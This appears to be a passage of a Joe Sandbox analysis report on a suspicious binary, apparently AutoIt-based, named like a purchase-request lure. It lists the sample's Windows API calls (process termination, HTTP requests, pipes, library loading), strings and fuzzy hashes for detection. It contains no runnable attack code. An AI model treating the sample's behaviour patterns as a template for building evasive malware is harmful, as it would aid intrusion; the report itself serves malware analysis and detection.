                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007F7C4C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: 57501f2499a4f8918b4ecccd5cd87a33ff8cb2eecb17a8e3e876694d39fb0482
                                                            • Instruction ID: 3cd9e410f2dd768d56721cee58073dff6f3819e91df219f70afdfb618ca26bae
                                                            • Opcode Fuzzy Hash: 57501f2499a4f8918b4ecccd5cd87a33ff8cb2eecb17a8e3e876694d39fb0482
                                                            • Instruction Fuzzy Hash: D1F03A72242258BBE7215BA2AC0EEEF7B7CEFC6B11F000418FA1191151E7A05A41D6B5
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 007F9A33
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F9A44
                                                            • TerminateThread.KERNEL32(?,000001F6,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F9A51
                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F9A5E
                                                              • Part of subcall function 007F93D1: CloseHandle.KERNEL32(?,?,007F9A6B,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F93DB
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 007F9A71
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F9A78
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: ce53c4d3cf54a8b7f928f89cc279310e0eccc9bba0ee70dcc639cff06ef484b5
                                                            • Instruction ID: ec6ce175f3b5fb522bef07d3f4f1f770f706287700c3a80ae92ff3dfa80c3fdc
                                                            • Opcode Fuzzy Hash: ce53c4d3cf54a8b7f928f89cc279310e0eccc9bba0ee70dcc639cff06ef484b5
                                                            • Instruction Fuzzy Hash: C8F08232141311ABD7111BA4FC8DEEB773AFFC4302B140825F703911A1DBB9A811DB51
                                                            APIs
                                                              • Part of subcall function 007CF4EA: std::exception::exception.LIBCMT ref: 007CF51E
                                                              • Part of subcall function 007CF4EA: __CxxThrowException@8.LIBCMT ref: 007CF533
                                                            • __swprintf.LIBCMT ref: 007B1EA6
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 007B1D49
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 2125237772-557222456
                                                            • Opcode ID: 8c537c42450f5edff3f486ab786846bba0a4306c7f3e96775f910dea23429419
                                                            • Instruction ID: 7450e677f9a359779b8ab691e247d53d7742b23ece826f6816eb9c841bda1fa4
                                                            • Opcode Fuzzy Hash: 8c537c42450f5edff3f486ab786846bba0a4306c7f3e96775f910dea23429419
                                                            • Instruction Fuzzy Hash: 01917971108211DFC724EF24C899EAEB7A4FF85700F40492DF985972A2DB78EE45CB92
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0080B006
                                                            • CharUpperBuffW.USER32(?,?), ref: 0080B115
                                                            • VariantClear.OLEAUT32(?), ref: 0080B298
                                                              • Part of subcall function 007F9DC5: VariantInit.OLEAUT32(00000000), ref: 007F9E05
                                                              • Part of subcall function 007F9DC5: VariantCopy.OLEAUT32(?,?), ref: 007F9E0E
                                                              • Part of subcall function 007F9DC5: VariantClear.OLEAUT32(?), ref: 007F9E1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: e21be56a7c018a87e21c1af62b0029fc07506a1ac514f786d319cd918e6ca09e
                                                            • Instruction ID: 25a2f365c8539050e6ed31ee0e8ecf804798deea1c08bd630bb707365116e1ea
                                                            • Opcode Fuzzy Hash: e21be56a7c018a87e21c1af62b0029fc07506a1ac514f786d319cd918e6ca09e
                                                            • Instruction Fuzzy Hash: 08912770608305DFCB50DF24C885A9AB7E4FF89704F04886DF99ADB2A2DB35E905CB52
                                                            APIs
                                                              • Part of subcall function 007CC6F4: _wcscpy.LIBCMT ref: 007CC717
                                                            • _memset.LIBCMT ref: 007F5438
                                                            • GetMenuItemInfoW.USER32(?), ref: 007F5467
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007F5513
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007F553D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: 53b7dc04e241a97bd610c12c9e812f93a585681482ac70526a72cfb1eef4bf00
                                                            • Instruction ID: 80577db7551d1494b3a0ba9273ed2ebd403b64b0a455e3debcb40438dd4066c8
                                                            • Opcode Fuzzy Hash: 53b7dc04e241a97bd610c12c9e812f93a585681482ac70526a72cfb1eef4bf00
                                                            • Instruction Fuzzy Hash: 925121712087099BD7149B2CC8497BBB7EAEF85364F14062AFB99C3291DB68CC448B52
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007F027B
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007F02B1
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007F02C2
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007F0344
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: DllGetClassObject
                                                            • API String ID: 753597075-1075368562
                                                            • Opcode ID: 14e7a58a0d13bc8df1bb45820057f27cea04d667840046395fddc1342fe9cea4
                                                            • Instruction ID: 19cc86e7869acf18b0e9c785b3ad44fec9c50dc66fa275506671ac77c68ebd5b
                                                            • Opcode Fuzzy Hash: 14e7a58a0d13bc8df1bb45820057f27cea04d667840046395fddc1342fe9cea4
                                                            • Instruction Fuzzy Hash: 26414DB1600208EFDB15CF64C984BAA7BB9EF45310B1480ADEA09DF306D7B9D944DBE0
                                                            APIs
                                                            • _memset.LIBCMT ref: 007F5075
                                                            • GetMenuItemInfoW.USER32 ref: 007F5091
                                                            • DeleteMenu.USER32(00000004,00000007,00000000), ref: 007F50D7
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00871708,00000000), ref: 007F5120
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: e952ad23e6e5c15500f03c2bda545d2abfac0c62c2347103d5c4c04e8c6cf70b
                                                            • Instruction ID: 8e6de2ea9fae874ecbd15a4d529493ad05808de86f6ca93cace8d261f5b8f535
                                                            • Opcode Fuzzy Hash: e952ad23e6e5c15500f03c2bda545d2abfac0c62c2347103d5c4c04e8c6cf70b
                                                            • Instruction Fuzzy Hash: 6641C130208709EFD720DF28D885B6AB7E8AF85324F144A1EFB6597391D774E804CB62
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?), ref: 00810587
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 2358735015-567219261
                                                            • Opcode ID: aaee835e220791abf7d79f0db87c5458192e160aa7d49fe1aa0d52ca3e6c03a7
                                                            • Instruction ID: 38b320593f56c091c1a4c3d02063e7c9dd5891581581b48531269be2fbe4b459
                                                            • Opcode Fuzzy Hash: aaee835e220791abf7d79f0db87c5458192e160aa7d49fe1aa0d52ca3e6c03a7
                                                            • Instruction Fuzzy Hash: 45317E7050021AEBCF10EF54CC45AEEB3B8FF55314F108629E826E76D1DBB5A995CB90
                                                            APIs
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007EB88E
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007EB8A1
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 007EB8D1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3850602802-1403004172
                                                            • Opcode ID: 3abd429a250a83ef08cf2c134c3b9969233e12f390b1cb3c329ebd5c5616f294
                                                            • Instruction ID: de1aaacb71d585c74ea594b8bec353269a4742c42656dc46ff8faf93d48fa0b3
                                                            • Opcode Fuzzy Hash: 3abd429a250a83ef08cf2c134c3b9969233e12f390b1cb3c329ebd5c5616f294
                                                            • Instruction Fuzzy Hash: F62104B1901248EFDB04ABA5D88AEFF7B78EF59350B104129F021A62E0DB7C5D1686A0
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00804401
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00804427
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00804457
                                                            • InternetCloseHandle.WININET(00000000), ref: 0080449E
                                                              • Part of subcall function 00805052: GetLastError.KERNEL32(?,?,008043CC,00000000,00000000,00000001), ref: 00805067
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 1951874230-3916222277
                                                            • Opcode ID: ef6c59e47da7e129a88b140d45ded25bc094015c204bf3831b3f9d0a9e979537
                                                            • Instruction ID: 2544702d6b510d3a0c29fd762b651bec1d9328e39849cc9031ff67e8ba000d5f
                                                            • Opcode Fuzzy Hash: ef6c59e47da7e129a88b140d45ded25bc094015c204bf3831b3f9d0a9e979537
                                                            • Instruction Fuzzy Hash: 7321BEF2541A08BEE751AF64DC85EBFB6ECFF88748F10941AF209E2180EA648D059775
                                                            APIs
                                                              • Part of subcall function 007CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007CD1BA
                                                              • Part of subcall function 007CD17C: GetStockObject.GDI32(00000011), ref: 007CD1CE
                                                              • Part of subcall function 007CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 007CD1D8
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0081915C
                                                            • LoadLibraryW.KERNEL32(?), ref: 00819163
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00819178
                                                            • DestroyWindow.USER32(?), ref: 00819180
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: 2913dc2cb3743684243c11c33b11e83a66721f0ecc2c4e796c9f8ec5cd515293
                                                            • Instruction ID: b865661bc7ffad84f4765fa173b3fd4578b198b99bc2b770bfe468b415919c64
                                                            • Opcode Fuzzy Hash: 2913dc2cb3743684243c11c33b11e83a66721f0ecc2c4e796c9f8ec5cd515293
                                                            • Instruction Fuzzy Hash: 1C219D7120020ABBEF204E64DCA9EFA37ADFF99364F110628FA94D2190D735DCD1A760
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 007F9588
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007F95B9
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 007F95CB
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007F9605
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: bdca7f73db0bc3d609ce9a991ad4645868ecf643473115bfb48b1428751bfa5e
                                                            • Instruction ID: 20390256b064f649baf6e7923f1f8a94440491238462aa67857bb65d13d81a3e
                                                            • Opcode Fuzzy Hash: bdca7f73db0bc3d609ce9a991ad4645868ecf643473115bfb48b1428751bfa5e
                                                            • Instruction Fuzzy Hash: 4F218E70600309ABDB219F25DC05BAABBB8BF94720F204A19FBA1D73D0D774E950CB20
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 007F9653
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007F9683
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 007F9694
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007F96CE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: b08b539089f00023202107f17fa96b1f6054ccdd0be706b05f0565888904f7c9
                                                            • Instruction ID: d02324a015ff6c7ef020ed78b9db199c01da0245dc791047c7e9286832369f33
                                                            • Opcode Fuzzy Hash: b08b539089f00023202107f17fa96b1f6054ccdd0be706b05f0565888904f7c9
                                                            • Instruction Fuzzy Hash: 1C216D71600309DBDB209F699C44FAAB7B8BF95724F200A19FBA1E73D0E7749841CB50
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 007FDB0A
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007FDB5E
                                                            • __swprintf.LIBCMT ref: 007FDB77
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0084DC00), ref: 007FDBB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: ff47bedd76c9e91d97ed8dd241b835521dc910be7f1a5af2ebd364a266c4dc44
                                                            • Instruction ID: dad49e41466d9ac68ec16f987b640099bbeecc663a94adcaf1f805ad3fb0572c
                                                            • Opcode Fuzzy Hash: ff47bedd76c9e91d97ed8dd241b835521dc910be7f1a5af2ebd364a266c4dc44
                                                            • Instruction Fuzzy Hash: 16217175600208EFCB11EFA4D989EEEB7B8EF88704B004069F605D7351DB74EA01DB61
                                                            APIs
                                                              • Part of subcall function 007EC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007EC84A
                                                              • Part of subcall function 007EC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007EC85D
                                                              • Part of subcall function 007EC82D: GetCurrentThreadId.KERNEL32 ref: 007EC864
                                                              • Part of subcall function 007EC82D: AttachThreadInput.USER32(00000000), ref: 007EC86B
                                                            • GetFocus.USER32 ref: 007ECA05
                                                              • Part of subcall function 007EC876: GetParent.USER32(?), ref: 007EC884
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 007ECA4E
                                                            • EnumChildWindows.USER32(?,007ECAC4), ref: 007ECA76
                                                            • __swprintf.LIBCMT ref: 007ECA90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                            • String ID: %s%d
                                                            • API String ID: 3187004680-1110647743
                                                            • Opcode ID: a8ba2e8e1de41788574492cf80776d50dd51f879fed04f6246230f09f69cef5b
                                                            • Instruction ID: 0988582445e3895bd21366fc96d53d291948c80454c0f835783cd3787c072966
                                                            • Opcode Fuzzy Hash: a8ba2e8e1de41788574492cf80776d50dd51f879fed04f6246230f09f69cef5b
                                                            • Instruction Fuzzy Hash: 33118775500205BBCF12BF619C8AFE9377DAF48714F008076FE18AA142DB789546DB70
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008119F3
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00811A26
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00811B49
                                                            • CloseHandle.KERNEL32(?), ref: 00811BBF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
